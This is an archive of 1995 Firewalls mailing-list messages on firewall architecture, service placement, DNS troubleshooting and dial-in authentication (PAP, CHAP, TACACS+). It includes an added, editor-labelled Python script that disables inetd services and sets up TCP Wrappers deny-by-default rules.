>My company is looking at getting a "real" connection to the Internet
>(surprise!) and since I'm the network guy I get to learn more than I ever
>wanted to know about firewalls. The part I don't understand is where you
>would place application services (WWW server and anon FTP server for outside
>customers to access) in the case of a dual-homed gateway or a screened-host
>firewall.
>
>In the case of a dual-homed firewall, I would assume the FTP and WWW server
>software would be directly on the firewall machine? Is this a security risk?

Yes, that's pretty much what folks usually do, and yes, it's a risk. In a nutshell, when (not if) someone breaks into your dual-homed host (via those services or others), you're hosed; the attackers will then have free access to your internal network. It generally doesn't take much (often just a little bit of packet sniffing) to leverage that into access to the internal systems.

>Or do you just provide an incoming proxy on the firewall that points to
>an inside machine running the httpd or ftpd servers?

You could do that, but you're merely moving the problem, not eliminating it.

>In the case of the screened host implementation, do the services go on the
>bastion host, or does it simply offer an incoming proxy service to the real
>machine running the WWW or FTP software? I don't see configuring the router
>to allow incoming FTP or http traffic to a host other than the bastion,
>otherwise you're no longer running a screened host type of firewall. Am I right?

Again, you could do it either way, but the problem remains: when someone compromises the bastion host, your internal network is completely exposed to it.

This is why I strongly prefer screened subnet architectures to screened host or dual-homed host architectures. There's a measure of redundancy in a screened subnet architecture; even if an attacker utterly compromises the bastion host, they still have to get past the interior filtering system to attack the internal systems, and there's no strictly-internal traffic for them to snoop on while they're trying to figure out how to proceed.

We discuss these and other related issues in some detail, complete with diagrams, in Chapter 4 of "Building Internet Firewalls"; see http://www.greatcircle.com/firewalls-book or send email to firewalls-book-info@greatcircle.com for more information about the book.
-Brent -- Brent Chapman | Great Circle Associates | For Firewalls Tutorial info: Brent@GreatCircle.COM | 1057 West Dana Street | Tutorial-Info@GreatCircle.COM +1 415 962 0841 | Mountain View, CA 94041 | http://www.greatcircle.com From firewalls-owner Wed Sep 6 13:02:44 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA02039 for firewalls-outgoing; Wed, 6 Sep 1995 12:48:24 -0700 Received: from relay4.UU.NET (relay4.UU.NET [192.48.96.14]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id MAA02032 for ; Wed, 6 Sep 1995 12:48:19 -0700 Received: from maestro.Maestro.COM by relay4.UU.NET with SMTP id QQzgbf11309; Wed, 6 Sep 1995 15:46:58 -0400 Received: by maestro.Maestro.COM (4.1/MAESTRO-0.1/07-03-93) id AA01981; Wed, 6 Sep 95 15:39:23 EDT Date: Wed, 6 Sep 1995 15:39:22 -0400 (EDT) From: Sick Puppy Subject: Windows NT servers in different networks and firewall To: firewalls@GreatCircle.com Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Just when we are all getting a warm snug feeling with TCP/IP, Windows NT jumps out to hit us over the head with its TCP/IP - IPX - NetBios multiple stack. Given the ease with which it is possible to do IP spoofing with commercially available software and a publicly available sniffer, I wonder what can be done to effectively firewall two Windows NT servers that each live in a different network but share a common user population between the two networks. The firewall would have to handle authentication, file and print services and rpc calls. Which vendors, if any, supply a firewall with these capabilities for Windows NT servers? 
Sick Puppy, the Cat_Eating_Dawg Photonic & Tachyonic Systems Engineer of the Stealth Starship Dark Matter -=:( Chained, whipped, beaten and severely abused in Katherine's Dungeon ):=- -=:( How could anything that feels so good be so wrong ):=- From firewalls-owner Wed Sep 6 13:33:39 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA02598 for firewalls-outgoing; Wed, 6 Sep 1995 13:14:55 -0700 Received: from sun.aitc.rest.tasc.com (sun.aitc.rest.tasc.com [147.81.50.129]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id NAA02578 for ; Wed, 6 Sep 1995 13:14:49 -0700 Received: from iwdc1.office.rest.tasc.com by sun.aitc.rest.tasc.com (NX5.67d/NX3.0M-TASCnet-003) id AA09920; Wed, 6 Sep 95 16:06:27 -0500 Received: by AA03508wdc1.office.rest.tasc.com (4.1/SMI-4.1) id AA03508; Wed, 6 Sep 95 16:13:09 EDT Date: Wed, 6 Sep 95 16:13:09 EDT From: rebowes@iwdc1.office.rest.tasc.com (Bob Bowes) Message-Id: <9509062013.AA03508@AA03508wdc1.office.rest.tasc.com> To: firewalls@greatcircle.com, msh@chesapeake.com Subject: Re: Where to put Internet Services? Reply-To: rebowes@tasc.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk With a dual-homed firewall, your web page and ftp site can go in the demilitarized zone (between the two homes). With any other firewall (screening or proxy recommended), put these services on a machine outside the firewall. You can still place it behind the router. Don't put anything you don't want made public on this machine. Good luck on setting up your service! 
Bob Bowes

From firewalls-owner Wed Sep 6 13:37:47 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA02503 for firewalls-outgoing; Wed, 6 Sep 1995 13:11:53 -0700 Received: from hawksbill.sprintmrn.com (hawksbill.sprintmrn.com [199.11.1.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id NAA02496 for ; Wed, 6 Sep 1995 13:11:47 -0700 Received: by hawksbill.sprintmrn.com (5.65/1.34) id AA18891; Wed, 6 Sep 95 16:10:20 -0500 From: paul@hawksbill.sprintmrn.com (Paul Ferguson) Message-Id: <9509062110.AA18891@hawksbill.sprintmrn.com> Subject: Re: Where to put Internet Services? To: msh@chesapeake.com Date: Wed, 6 Sep 1995 16:10:20 -0500 (EST) Cc: firewalls@greatcircle.com In-Reply-To: <9509061151.aa08840@cdssrv.chesapeake.com> from "Matt Hagadorn" at Sep 6, 95 11:48:05 am X-Mailer: ELM [version 2.4 PL22] Content-Type: text Content-Length: 1270 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

>
> My company is looking at getting a "real" connection to the Internet
> (surprise!) and since I'm the network guy I get to learn more than I ever
> wanted to know about firewalls. The part I don't understand is where you
> would place application services (WWW server and anon FTP server for outside
> customers to access) in the case of a dual-homed gateway or a screened-host
> firewall.
>
> In the case of a dual-homed firewall, I would assume the FTP and WWW server
> software would be directly on the firewall machine? Is this a security risk?

Big time.

> Or do you just provide an incoming proxy on the firewall that points to
> an inside machine running the httpd or ftpd servers?

You can do that, or you could simply place them on the external perimeter network. It all depends on what value you place on these servers. If you want to minimize risk, then proxy services are the way to go.
- paul _______________________________________________________________________________ Paul Ferguson Dulcius Ex Asperis US Sprint tel: 703.689.6828 Managed Network Engineering internet: paul@hawk.sprintmrn.com Reston, Virginia USA http://www.sprintmrn.com From firewalls-owner Wed Sep 6 14:00:22 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA03041 for firewalls-outgoing; Wed, 6 Sep 1995 13:33:24 -0700 Received: from tigger.jvnc.net (tigger.jvnc.net [128.121.50.145]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id NAA03034 for ; Wed, 6 Sep 1995 13:33:14 -0700 Received: from [192.67.239.213] (franklin-tty13.jvnc.net) by tigger.jvnc.net with SMTP id AA25127 (5.65c/IDA-1.4.4 for ip-atm@matmos.hpl.hp.com); Wed, 23 Aug 1995 14:16:59 -0400 Date: Wed, 23 Aug 1995 14:16:59 -0400 X-Sender: corecom@tigger.jvnc.net Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Firewalls@greatcircle.com, ip-atm@matmos.hpl.hp.com From: dave@corecom.com (David M. Piscitello) Subject: Call for papers Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, The following call for papers seems relevant to these lists, but as I did not see it posted here, I'm cross posting... regards, dave ------------ C A L L F O R P A P E R S 3rd annual NetWorld+Interop Engineers' Conference Las Vegas, Nevada April 3rd and 4th, 1996 GENERAL INFORMATION The NetWorld+Interop US Program Committee is pleased to solicit original technical papers for the 3rd annual Interop Engineers' Conference, held in conjunction with the NetWorld+Interop Conference and Exhibition, from April 1st through 5th, 1996. 
In order to focus discussion and interaction, this year the Engineers' Conference is focusing on six topic areas of interest in computer-communications: - Resource Management over Heterogeneous Networks - Cell-based Routing - Traffic management and the Future of Congestion Control - Distributed Applications Management - Video over Enterprise Networks - High-speed Packet Filtering and Firewalling A detailed description of each topic area appears below. This conference seeks to bring together research scholars, engineers, and vendors to address pragmatic engineering issues in the field of networking and distributed systems interoperability. It is an excellent forum for engineers and researchers to publish papers on solutions to today's engineering-related problems. PROCEDURES AND DEADLINES 1. Interested parties should submit abstracts of their papers by September 8, 1995 An abstract should be 500-1000 words in length and convey the key aspects of the paper. All abstracts should be submitted in ASCII. The program committee will indicate its acceptance (or not), no later than September 22, 1995. To submit an abstract, send a message To: engrconf@interop.com Subject: abstract (Do not have anything else in the Subject: line.) The message should contain your complete contact information (name, affiliation, postal address, telephone, facsimile, and e-mail) along with your abstract. An automated reply will confirm receipt of your abstract. 2. If an abstract is accepted, the author(s) should submit a first draft of their paper by December 31, 1995 A paper should be between 10 to 16 pages in length, and be written in technical english. All papers should be submitted either in ASCII or PostScript. The program committee will indicate its acceptance (with comments) or not, on January 19, 1996. 3. 
If a paper is accepted, the author(s) should submit the final copy of their paper, reflecting the comments of the program committee by February 23, 1996 All final copies will be published in the event proceedings. Upon receipt of the final copy, the program committee will inform the author(s) if their papers are to be presented at the event. A presentation should be 20-25 minutes, excluding questions. Note that although every author who submits a final copy of an accepted paper receives a complimentary admission to the Engineers' Conference as well as the N+I General Conference and Exhibition, there may not be sufficient speaking slots for each accepted paper. DESCRIPTION OF TOPICS 1. Resource Management over Heterogeneous Networks Papers in this topic area are expected to address issues related to providing bandwidth guarantees or bandwidth on demand solutions in heterogeneous networks, i.e., networks whose paths include a variety of high-speed transmission media and services (ATM, FDDI, cell- and frame-based public services, high-speed and legacy LANs). Subjects include, but are not limited to, traffic engineering and service provisioning, routing and resource reservation models, traffic profiles (observed and simulated), traffic shaping and management, and queueing models (effectiveness of models, observed and simulated). 2. Next Generation Cell-based Routing While the industry debates ATM vs. routing, researchers are beginning to develop next generation routers which combine the best of both technologies. So-called cell-based routers offer low latency and high performance of cell technology with the software robustness of existing routers. In addition, cell-based routers may provide support for services such as virtual routing, IP multicast, traffic management, along with support for non-internet services such as voice and real time video. Subjects include, but are not limited to, design issues for cell-based routers, implementation, and deployment experiences. 
3. Traffic management and the Future of Congestion Control Papers in this topic area are expected to address the future of traffic management and congestion control with respect to the different problems associated with handling voice, video, and data. Papers should focus on emerging structures and technologies that address these issues. Subjects include, but are not limited to, network complexity, size, diversity, and gigabit speeds. 4. Distributed Applications Management Papers in this topic area are expected to address issues related to managing distributed applications running over a mixture of desktop and network operating systems on both local and wide area networks. Subjects include, but are not limited to, tracking desktop computer hardware and software inventory, providing pro-active alert notification of network and applications processes, interfaces to help-desk management software and network management consoles, gathering usage statistics of file, print, and applications services, managing redundant WAN links to distributed servers, and managing multiple network operating systems services. 5. Video over Enterprise Networks Network-based video products are available today, but no one would mistake current service for movie-theatre quality or face-to-face interaction. Improvements are needed in network capabilities and their use by video-based applications. Papers for this topic area will discuss research efforts to improve the basic technology of network-based video services and techniques for making them more accessible. Subjects include, but are not limited to, schemes for picture encoding, improvements in bandwidth use, methods for accommodating variable latency, integration for multi-media service, standards efforts for 21st century service, and access to video applications. 6. 
High-speed Packet Filtering and Firewalling Papers in this topic area are expected to address issues related to providing effective packet-filters and firewalls while sustaining very high transmission rates between a public internetwork and a private network. Authors are encouraged to demonstrate the effectiveness or limitations of current firewall techniques through observation and simulation, or to propose advanced packet-filtering techniques that may be implemented in routers or intermediate systems to obviate the need for application-level proxies and host processing. ####### David M. Piscitello Core Competence, Inc. 1620 Tuckerstown Road Dresher, PA USA 19025 dave@corecom.com 1.215.830.0692 From firewalls-owner Wed Sep 6 17:02:24 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA07173 for firewalls-outgoing; Wed, 6 Sep 1995 16:56:15 -0700 Received: from ucsdext.ucsd.edu (ucsdext.ucsd.edu [132.239.108.211]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id QAA07166 for ; Wed, 6 Sep 1995 16:56:10 -0700 Received: from juju.adnc.com (robo13.adnc.com) by ucsdext.ucsd.edu (5.x/SMI-SVR4) id AA29136; Wed, 6 Sep 1995 16:50:09 -0700 Message-Id: <9509062350.AA29136@ucsdext.ucsd.edu> X-Sender: dschiffrin@popmail.ucsd.edu X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Wed, 06 Sep 1995 17:01:58 -0700 To: lpierce@intex.net (S. Lane Pierce) From: David Schiffrin Subject: Re: firewall with only one IP address ??? Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 09:14 AM 9/5/95 -0500, S. Lane Pierce wrote: >Matt- > >Are you sure you only get 1 host address or 1 network address? Usually 1 >class c network address is assigned, this will yield 254 host addresses. ------------snipped-------------->8 >Check with your provider. > >Good luck. 
> [more stuff snipped] many providers I've worked with have low cost connections which are restricted to one IP address (PPP style) often, Internic will issue a class c if requested, but the provider may charge $$ to advertise DNS into the assigned net-number. cheers -Dave -------------------------------------------------------------------------------- David Schiffrin dschiffrin@ucsd.edu From firewalls-owner Wed Sep 6 17:30:09 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA07251 for firewalls-outgoing; Wed, 6 Sep 1995 17:01:59 -0700 Received: from ucsdext.ucsd.edu (ucsdext.ucsd.edu [132.239.108.211]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id RAA07244 for ; Wed, 6 Sep 1995 17:01:54 -0700 Received: from robo13.adnc.com by ucsdext.ucsd.edu (5.x/SMI-SVR4) id AB29136; Wed, 6 Sep 1995 16:50:21 -0700 Message-Id: <9509062350.AB29136@ucsdext.ucsd.edu> X-Sender: dschiffrin@popmail.ucsd.edu X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Wed, 06 Sep 1995 17:02:09 -0700 To: Tham Huei Hwan From: David Schiffrin Subject: Re: DNS problem on Netra i Cc: firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 02:46 PM 9/6/95 +0800, Tham Huei Hwan wrote: >HI, > >Any body have any idea what is going wrong on my Netra i Internet server. 
>My Netra i is setup with the ip address 200.200.9.1 and with the domain >name as abc.com.my >My Internet Network Provider(INP) is jaring.my and the ip address is >192.228.128.20 > >When I use the nslookup command, its gives me the following >messages: > >#nslookup >*** Can't find server name for address 200.200.9.1: Non-existent domain >Default Server: jaring.my >Address: 192.228.128.20 > > >>server 200.200.9.1 >Default Server: [200.200.9.1] >Address: 200.200.9.1 > > >>set type=ns >>abc.com.my >Server: [200.200.9.1] >Address: 200.200.9.1 > >*** No name server (NS) records available for abc.com.my > >Anyway, My server can access Internet and send E-mail without any problem >and the outside world cannot send the E-mail to this server. > I'd say your problem is that your provider's DNS server isn't advertising your ip addresses. jaring.my doesn't resolve 200.200.9.1 for me either. give them a call, I'm sure they can help in just a few moments. -------------------------------------------------------------------------------- David Schiffrin dschiffrin@ucsd.edu From firewalls-owner Thu Sep 7 05:32:32 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA15127 for firewalls-outgoing; Thu, 7 Sep 1995 05:29:28 -0700 Received: from linda.fdata.se (linda.fdata.se [159.72.248.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id FAA15120 for ; Thu, 7 Sep 1995 05:29:24 -0700 Received: from WMX.WMDATA.SE (wmx.wmdata.se [164.9.179.100]) by linda.fdata.se (8.6.12/8.6.9) with SMTP id OAA04371 for ; Thu, 7 Sep 1995 14:24:46 +0200 X400-Received: by /PRMD=WMDATAWMX/ADMD=WMDATA/C=SE/; Relayed; Thu, 7 Sep 1995 14:27:34 +0100 Date: Thu, 7 Sep 1995 14:27:34 +0100 X400-Originator: Roberto.Piludu@STO4.wmdata.se X400-Recipients: firewalls@greatcircle.com X400-MTS-Identifier: [/PRMD=WMDATA/ADMD=WMDATA/C=SE/;0012400001517066000002] X400-Content-Type: P2-1988 (22) Content-Identifier: CSI NC V3.0 From: "Piludu, Roberto" Message-ID: 
<0004622A.MAI*/S=WMROPIL/OU=STO4/OU=WMDATA/O=MSMAIL/PRMD=WMDATA/ADMD=WMDATA/C=SE/@MHS> To: "'Firewalls'" Subject: SNA through firewalls? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, I'm kind of new to this with firewalls so the question might be a bit strange, but suppose you have an AS400 behind a firewall that wants to talk to another on the outside. Are there any commercial firewalls that can talk SNA, or is there a need for some sort of "converter" between TCP/IP and SNA? I would be very grateful for any suggestions. Thanks /roberto

From firewalls-owner Thu Sep 7 06:32:27 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA15647 for firewalls-outgoing; Thu, 7 Sep 1995 06:31:16 -0700 Received: from uustar.starnet.net (uustar.starnet.net [199.217.253.12]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id GAA15640 for ; Thu, 7 Sep 1995 06:31:13 -0700 Received: from taft.UUCP by uustar.starnet.net with UUCP id AA13371 (5.67b/IDA-1.5 for greatcircle.com!firewalls); Thu, 7 Sep 1995 08:20:12 -0500 Received: (from nicholcs@localhost) by taft.AGEdwards.COM (8.6.9/8.6.9) id HAA13286; Thu, 7 Sep 1995 07:56:18 -0500 Date: Thu, 7 Sep 1995 07:46:36 -0500 (CDT) From: Chris S Nichols Subject: Cisco 2511s To: firewalls@greatcircle.com Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I have been sent a proposal from a vendor who wishes to allow remote access to a sent using a Cisco 2511 on the LAN. They want to allow a laptop using PPP dialin to a Cisco 2511 with a remote access port and use the PAP protocol which they claim will take care of security. They claim this can't be hacked.>:-() Their proposal claims that a remote user dialing in with PPP would have to know the 2511 port IP address and then issue an authentication string via PAP(?) which provides security.
My opinion is, no, you want remote access, you go through an authentication server and use a Security Dynamics card. What the heck is this PAP stuff and how much of a potential mess is this? TIA, Chris N From firewalls-owner Thu Sep 7 07:00:20 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA15825 for firewalls-outgoing; Thu, 7 Sep 1995 06:42:50 -0700 Received: from mms (mms.mms-gmbh.de [193.103.159.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id GAA15818 for ; Thu, 7 Sep 1995 06:42:45 -0700 Message-Id: Comments: Authenticated sender is From: "Frank Heinzius" To: portmaster-users@livingston.com Date: Thu, 7 Sep 1995 15:43:15 +0000 Subject: Comparison RADIUS and TACACS+ Reply-to: frimp@mms-gmbh.de CC: firewalls@greatcircle.com Priority: normal X-mailer: Pegasus Mail for Windows (v2.01) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi all! Does anybody have a comparison between the features of RADIUS and TACACS+? A feature table comparison would be perfect. I have customers who want to buy a Cisco Access Server, I want to sell them Livingston PortMasters. Despite this, Cisco and Livingston announced that they would integrate each others features into their machines. Thanks in advance, Frank -- ***** The expressed opinions are totally mine! ***** Frank M. 
Heinzius MMS Communication GmbH frimp@mms-gmbh.de Eiffestrasse 598 Phone: +49 40 2111105-0 Fax: +49 40 210 32 210

From firewalls-owner Thu Sep 7 08:30:18 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA17287 for firewalls-outgoing; Thu, 7 Sep 1995 08:22:16 -0700 Received: from westie.mid.net (westie.mid.net [198.247.250.16]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA17280 for ; Thu, 7 Sep 1995 08:22:11 -0700 Received: from gaijin.mid.net (gaijin.mid.net [198.247.250.28]) by westie.mid.net (8.6.10/8.6.9) with ESMTP id KAA03038 for ; Thu, 7 Sep 1995 10:20:09 -0500 Received: (from alan@localhost) by gaijin.mid.net (8.6.10/8.6.9) id BAA05618; Sat, 2 Sep 1995 01:43:47 -0500 From: Alan Hannan Message-Id: <199509020643.BAA05618@gaijin.mid.net> Subject: Re: how to close socket To: jmeritt@smtpinet.aspensys.com (Meritt Jim) Date: Sat, 2 Sep 1995 01:43:47 -0500 (CDT) Cc: firewalls@GreatCircle.COM In-Reply-To: <9508018099.AA809996857@smtpinet.aspensys.com> from "Meritt, Jim" at Sep 1, 95 04:07:37 pm X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 837 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ......... Meritt, Jim is rumored to have said: --> On a standard sun box using /etc/services and inetd, how would you --> stop traffic from being passed through a port? Any of the following three will work. #1 is the simplest, and most likely the one you will choose. Good luck.

1) Stop the service from being spawned by inetd:
   A) Comment out the entry in /etc/inetd.conf for the service you want to disallow.
   B) Restart inetd.
2) Control access for the service using TCP Wrappers:
   A) Find tcp wrappers.
   B) Install it.
3) Modify the binary/proxy/service to filter/disallow connections based upon proprietary configurations.
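Options 1 and 2 from Alan Hannan's list, worked through as an added example by the editor; this is not part of any message in the thread. The script rewrites an inetd.conf, using a constructed sample file rather than one taken from a real host: it comments out the services to be closed by matching the first field exactly (so closing `ftp` does not touch `tftp`), then points the surviving entries at tcpd so TCP Wrappers decides who may connect, and emits a deny-by-default hosts.deny with per-daemon exceptions in hosts.allow. The paths `/usr/sbin/tcpd` and `/usr/sbin/in.*`, the daemon names and the client lists are assumptions for the example. After installing the edited file, inetd re-reads it on SIGHUP (`kill -HUP <inetd pid>`), which is the "restart" in step 1B.

```python
"""Closing an inetd-served port: comment out its /etc/inetd.conf entry, or wrap it with tcpd."""

# Constructed sample inetd.conf for the example; not taken from any real host.
SAMPLE_INETD_CONF = """\
# service  socket  proto  wait/nowait  user    server-path             args
ftp      stream  tcp    nowait       root    /usr/sbin/in.ftpd       in.ftpd
telnet   stream  tcp    nowait       root    /usr/sbin/in.telnetd    in.telnetd
tftp     dgram   udp    wait         root    /usr/sbin/in.tftpd      in.tftpd -s /tftpboot
finger   stream  tcp    nowait       nobody  /usr/sbin/in.fingerd    in.fingerd
#comsat  dgram   udp    wait         root    /usr/sbin/in.comsat     in.comsat
"""


def _is_entry(line):
    """True for a live service entry; blank lines and '#' comments are not entries."""
    s = line.strip()
    return bool(s) and not s.startswith("#")


def active_services(conf_text):
    """Service names inetd would still listen for; compare against a port scan of the box."""
    return [line.split()[0] for line in conf_text.splitlines() if _is_entry(line)]


def disable_services(conf_text, services):
    """Option 1A: comment out every live entry whose service field is in `services`.
    Matching the first field exactly means 'ftp' does not touch 'tftp' or vice versa."""
    out, disabled = [], []
    for line in conf_text.splitlines():
        if _is_entry(line) and line.split()[0] in services:
            out.append("#" + line)          # inetd skips lines beginning with '#'
            disabled.append(line.split()[0])
        else:
            out.append(line)
    return "\n".join(out) + "\n", disabled


def wrap_with_tcpd(conf_text, tcpd="/usr/sbin/tcpd"):
    """Option 2: hand the remaining entries to tcpd, which consults hosts.allow and
    hosts.deny and then execs the real server named in the args field (the classic
    'easy' tcpd setup, where tcpd finds in.ftpd in its compiled-in daemon directory).
    Already-wrapped entries are left alone, so the function is safe to re-run."""
    out = []
    for line in conf_text.splitlines():
        fields = line.split(None, 6)          # 7 fields; server args stay together in the last
        if _is_entry(line) and len(fields) == 7 and fields[5] != tcpd:
            fields[5] = tcpd
            out.append("\t".join(fields))
        else:
            out.append(line)
    return "\n".join(out) + "\n"


def hosts_access_rules(allowed):
    """Deny-by-default TCP Wrappers policy: hosts.deny refuses everything, hosts.allow
    lists per-daemon exceptions. `allowed` maps daemon name -> client list (assumed values)."""
    deny = "ALL: ALL\n"
    allow = "".join(f"{daemon}: {clients}\n" for daemon, clients in sorted(allowed.items()))
    return allow, deny


if __name__ == "__main__":
    conf, gone = disable_services(SAMPLE_INETD_CONF, {"telnet", "finger"})
    print("disabled:", gone, "still active:", active_services(conf))
    print(wrap_with_tcpd(conf))
    allow, deny = hosts_access_rules({"in.ftpd": "192.168.1.", "in.tftpd": "LOCAL"})
    print("hosts.allow:\n" + allow + "hosts.deny:\n" + deny)
```

Run against a copy of the real file, diff the result, and only then install it; the `active_services` list is what a port scan of the host should agree with once inetd has been HUPped.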
-- Alan Hannan Email: alan@mid.net Network Systems Administrator Voice: (402) 472-0239 MIDnet, Lincoln NOC Office Fax: (402) 472-0240 From firewalls-owner Thu Sep 7 09:00:13 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA17686 for firewalls-outgoing; Thu, 7 Sep 1995 08:51:37 -0700 Received: from theory.tc.cornell.edu (THEORY.TC.CORNELL.EDU [132.236.98.174]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA17672 for ; Thu, 7 Sep 1995 08:51:33 -0700 Received: (from uactech@localhost) by theory.tc.cornell.edu (8.6.9/8.6.6) id LAA81693 for firewalls@greatcircle.com; Thu, 7 Sep 1995 11:50:05 -0400 Received: from ovid by ithaca.actech.com (920330.SGI/SMI-4.0) id AA01678; Thu, 7 Sep 95 11:45:53 -0400 Received: by ovid.actech.com (5.x/SMI-SVR4) id AA07907; Thu, 7 Sep 1995 11:45:50 -0400 Received: from Messages.8.5.N.CUILIB.3.45.SNAP.NOT.LINKED.ovid.sun4.51 via MS.5.6.ovid.sun4_51; Thu, 7 Sep 1995 11:45:49 -0400 (EDT) Message-Id: Date: Thu, 7 Sep 1995 11:45:49 -0400 (EDT) From: Steve Gaarder To: firewalls@greatcircle.com Subject: SLIP/PPP dialin on firewall? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I am setting up Internet connections for our company's various offices using firewalls built from BSD/OS and the TIS firewall toolkit. I want to add a modem-based backup link so that the firewalls can communicate with each other if an Internet link goes down. To do this, I am thinking of installing a modem for SLIP or PPP on the firewall machine, and disabling any logins other than to the PPP/SLIP software. It seems to me that as long as I treat a SLIP/PPP connection the same as one from the Internet, I am not reducing security significantly. Am I missing anything? 
thanks, Steven Gaarder Network and Systems Administrator gaarder@actech.com A C Technology, Ithaca, N.Y., USA From firewalls-owner Thu Sep 7 09:03:51 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA17612 for firewalls-outgoing; Thu, 7 Sep 1995 08:49:06 -0700 Received: from camelot.netmarket.com (camelot.netmarket.com [199.79.247.247]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA17605 for ; Thu, 7 Sep 1995 08:49:03 -0700 Received: from tannis.netmarket.com (tannis.netmarket.com [172.16.1.10]) by camelot.netmarket.com (8.6.10/8.6.9) with ESMTP id LAA24386 for ; Thu, 7 Sep 1995 11:47:37 -0400 Received: from brigadoon.netmarket.com (brigadoon.netmarket.com [172.16.1.236]) by tannis.netmarket.com (8.6.10/8.6.10) with SMTP id LAA00594 for ; Thu, 7 Sep 1995 11:47:37 -0400 Received: by brigadoon.netmarket.com (5.x/client-1.5) id AA02642; Thu, 7 Sep 1995 11:47:35 -0400 Message-Id: <9509071547.AA02642@brigadoon.netmarket.com> From: hal@netmarket.com (Hal Pomeranz) Date: Thu, 7 Sep 1995 11:47:34 -0400 X-Mailer: Mail User's Shell (7.2.5 10/14/92) To: firewalls@greatcircle.com Subject: Brent Chapman to appear at BBLISA 9/13 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk August: Firewalls Date: Sept 13, 1995 Time: 7:00-9:00pm Location: MIT Building E51 Room 85 (formerly Room 012) 70 Memorial Drive Cambridge, MA Speaker: Brent Chapman Coordinator: Hal Pomeranz Brent Chapman, manager of the "Firewalls" Internet mailing list and coauthor of the new book "Building Internet Firewalls" (O'Reilly & Associates; due out in mid-September) will be talking about current topics in building and managing Internet firewall security systems. --------------------------------------------------------------------- Want to find out more about BackBayLISA? the monthly meetings? the mailing lists? Send mail to Need directions to the meeting? 
ftp them from, ftp.bblisa.org:/pub/bblisa/directions --------------------------------------------------------------------- From firewalls-owner Thu Sep 7 09:32:27 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA19029 for firewalls-outgoing; Thu, 7 Sep 1995 09:29:54 -0700 Received: from stilton.cisco.com (stilton.cisco.com [171.69.1.161]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA19022 for ; Thu, 7 Sep 1995 09:29:51 -0700 Received: from cisco.com (localhost.cisco.com [127.0.0.1]) by stilton.cisco.com (8.6.8+c/8.6.5) with ESMTP id JAA01942; Thu, 7 Sep 1995 09:28:16 -0700 Message-Id: <199509071628.JAA01942@stilton.cisco.com> To: Chris S Nichols Cc: firewalls@GreatCircle.COM Subject: Re: Cisco 2511s In-Reply-To: Your message of "Thu, 07 Sep 1995 07:46:36 CDT." Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Id: <1937.810491295.1@cisco.com> Date: Thu, 07 Sep 1995 09:28:16 -0700 From: David Carrel Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Well, PAP is just one of the protocols used by PPP to convey authentication information. PAP has the drawback that it sends cleartext passwords. But it has the benefit that you can combine it with token cards like the SDI products. You cannot get the SDI cards to work with CHAP. The bit about having to know the IP address is bogus. IPCP negotiation will convey both IP addresses to any dialin client that authenticates properly. Even if it didn't, don't ever base security on obscurity. If they're planning to use fixed passwords with PAP, you may want to consider using CHAP instead as it doesn't transmit a cleartext password. (CHAP is available on all cisco gear.) You can use XTACACS or TACACS+ (and very shortly kerberos and RADIUS) for communicating to a remote authentication server. 
